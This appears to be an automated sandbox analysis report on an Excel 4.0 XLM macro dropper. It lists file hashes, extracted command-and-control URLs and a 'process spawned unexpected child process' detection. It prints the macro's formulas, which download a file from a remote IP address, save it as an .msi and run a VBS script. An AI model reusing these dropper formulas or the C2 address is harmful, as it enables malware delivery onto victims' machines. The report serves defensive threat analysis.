General

  • Target

    6844481b70bf368ae2f7e274a86529df

  • Size

    6KB

  • Sample

    231222-fgxl2segbn

  • MD5

    6844481b70bf368ae2f7e274a86529df

  • SHA1

    468c1c55012453aa5009203da9b3ec1fdefa0434

  • SHA256

    4d241dffcd3593e2aa9b50a0d776a15da340d0dd00716a9cc5cd714879698184

  • SHA512

    f3f12b71f757e7cb3babc3afb25968e6851d896d7e5f977f1bc689120c4ccde8939067f1c4ec8080c7a4bc853d4156b3d8c9c5b726e1b53b118362007cec8b67

  • SSDEEP

    192:NDSTuStbrA2OmmfR88UhHFBFYuqb98yJJ+W:NIuSM2wa1FYfb98yJL

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

xlm40.dropper

http://google.com/index.php

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

Targets

    • Target

      6844481b70bf368ae2f7e274a86529df

    • Size

      6KB

    • MD5

      6844481b70bf368ae2f7e274a86529df

    • SHA1

      468c1c55012453aa5009203da9b3ec1fdefa0434

    • SHA256

      4d241dffcd3593e2aa9b50a0d776a15da340d0dd00716a9cc5cd714879698184

    • SHA512

      f3f12b71f757e7cb3babc3afb25968e6851d896d7e5f977f1bc689120c4ccde8939067f1c4ec8080c7a4bc853d4156b3d8c9c5b726e1b53b118362007cec8b67

    • SSDEEP

      192:NDSTuStbrA2OmmfR88UhHFBFYuqb98yJJ+W:NIuSM2wa1FYfb98yJL

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

MITRE ATT&CK Enterprise v15

Tasks